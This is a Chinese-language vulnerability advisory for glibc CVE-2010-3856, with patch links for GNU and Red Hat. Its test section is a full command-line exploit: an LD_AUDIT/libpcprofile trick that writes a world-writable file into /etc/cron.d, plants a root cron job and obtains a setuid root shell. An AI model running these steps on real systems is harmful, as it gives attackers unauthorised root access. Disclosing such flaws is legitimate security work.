发布日期:2010-10-22
更新日期:2010-10-27受影响系统:
GNU glibc 2.x
描述:
--------------------------------------------------------------------------------
BUGTRAQ ID: 44347
CVE ID: CVE-2010-3856glibc是绝大多数Linux操作系统中C库的实现。在执行特权程序期间glibc动态连接器/加载器加载DSO以对其审计API提供回调时没有执行充分的安全性检查。本地攻击者可以利用这个漏洞通过包含有不安全构建程序的特制系统DSO库提升权限。<*来源:Tavis Ormandy (taviso@gentoo.org)
链接:http://secunia.com/advisories/41795/
http://marc.info/?l=bugtraq&m=128801542820572&w=2
https://www.redhat.com/support/errata/RHSA-2010-0793.html
*>测试方法:
--------------------------------------------------------------------------------警 告以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!# The creation mask is inherited by children, and survives even a setuid
# execve. Therefore, we can influence how files are created during
# exploitation.
$ umask 0# libpcprofile is distributed with the libc package.
$ dpkg -S /lib/libpcprofile.so
libc6: /lib/libpcprofile.so
$ ls -l /lib/libpcprofile.so
-rw-r--r-- 1 root root 5496 2010-10-12 03:32 /lib/libpcprofile.so# We identified one of the pcprofile constructors is unsafe to run with
# elevated privileges, as it creates the file specified in the output
# environment variable.
$ LD_AUDIT="libpcprofile.so" PCPROFILE_OUTPUT="/etc/cron.d/exploit" ping
ERROR: ld.so: object "libpcprofile.so" cannot be loaded as audit interface: undefined
symbol: la_version; ignored.
Usage: ping [-LRUbdfnqrvVaA] [-c count] [-i interval] [-w deadline]
[-p pattern] [-s packetsize] [-t ttl] [-I interface or address]
[-M mtu discovery hint] [-S sndbuf]
[ -T timestamp option ] [ -Q tos ] [hop1 ...] destination# This results in creating a world writable file in the crontab directory.
$ ls -l /etc/cron.d/exploit
-rw-rw-rw- 1 root taviso 65 2010-10-21 14:22 /etc/cron.d/exploit# Setup a cronjob to give us privileges (of course, there are dozens of other
# ways this could be exploited).
$ printf "* * * * * root cp /bin/dash /tmp/exploit; chmod u+s /tmp/exploit
" >
/etc/cron.d/exploit# Wait a few minutes...
$ ls -l /tmp/exploit
ls: cannot access /tmp/exploit: No such file or directory
$ ls -l /tmp/exploit
ls: cannot access /tmp/exploit: No such file or directory
$ ls -l /tmp/exploit
-rwsr-xr-x 1 root root 83888 2010-10-21 14:25 /tmp/exploit# A setuid root shell appears.
$ /tmp/exploit
# whoami
root建议:
--------------------------------------------------------------------------------
厂商补丁:GNU
---
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:http://sourceware.org/git/?p=glibc.git;a=commit;h=8e9f92e9d5d7737afdacf79b76d98c4c42980508RedHat
------
RedHat已经为此发布了一个安全公告(RHSA-2010:0793-01)以及相应补丁:
RHSA-2010:0793-01:Important: glibc security update
链接:https://www.redhat.com/support/errata/RHSA-2010-0793.htmlLinux Kernel tipc_msg_build()函数堆溢出漏洞Cisco CiscoWorks Common Services Web Server模块缓冲区溢出漏洞相关资讯 漏洞
- 快递官网漏洞泄露 1400 万用户信息 (08/12/2014 08:37:42)
- 要389目录服务器访问绕过漏洞 (10/01/2012 09:18:08)
- ASUS Net4Switch "ipswcom.dll" (03/02/2012 09:32:42)
| - 软件漏洞是一笔大买卖! (10/06/2012 08:28:32)
- PHPCMS V9.1.13任意文件包含漏洞分 (08/01/2012 07:23:17)
- Open Handset Alliance Android (03/01/2012 06:59:34)
|
本文评论 查看全部评论 (1)
评论声明- 尊重网上道德,遵守中华人民共和国的各项有关法律法规
- 承担一切因您的行为而直接或间接导致的民事或刑事法律责任
- 本站管理人员有权保留或删除其管辖留言中的任意内容
- 本站有权在网站内转载或引用您的评论
- 参与本评论即表明您已经阅读并接受上述条款
| |
易网时代-编程资源站